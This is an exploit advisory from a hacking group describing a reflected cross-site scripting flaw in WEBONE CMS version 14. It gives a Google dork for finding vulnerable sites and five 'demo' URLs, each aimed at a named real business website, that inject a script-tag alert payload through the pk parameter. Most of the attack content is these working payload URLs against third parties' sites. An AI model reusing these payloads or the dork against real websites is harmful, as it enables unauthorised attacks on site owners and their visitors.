WEBONE CMS version 14 suffers from a cross site scripting vulnerability.
d5f7e78a35f7ed4a83b67ecffb5c6863f0290d23b93409df4ca40a0528bf4a3d
######################
# Exploit Title : WEBONE CMS XSS Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.webone.com.tw/
# Google Dork : intext:"Power by WEBONE" inurl:pk=
# Tested On : Windows , Kali Linux
# Date: 2015/11/28
#
######################
#
#Demo:
#
#http://jolinn-pethouse.com.tw/news_con.php?lang=zh&pk=14%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E
#
#http://ander-express.com/news_con.php?lang=zh&pk=5%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E3
#
#http://www.shangli-international.com.tw/news_con.php?lang=zh&pk=197%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E
#
#http://www.imttaiwan.com/about.php?lang=en&pk=16%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E
#
#http://www.ghyang.com.tw/about.php?lang=zh&pk=3%27%3E%3CSCRIPT%3Ealert%28%22Pesian%20Hack%20Team%22%29%3C/SCRIPT/%3E
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################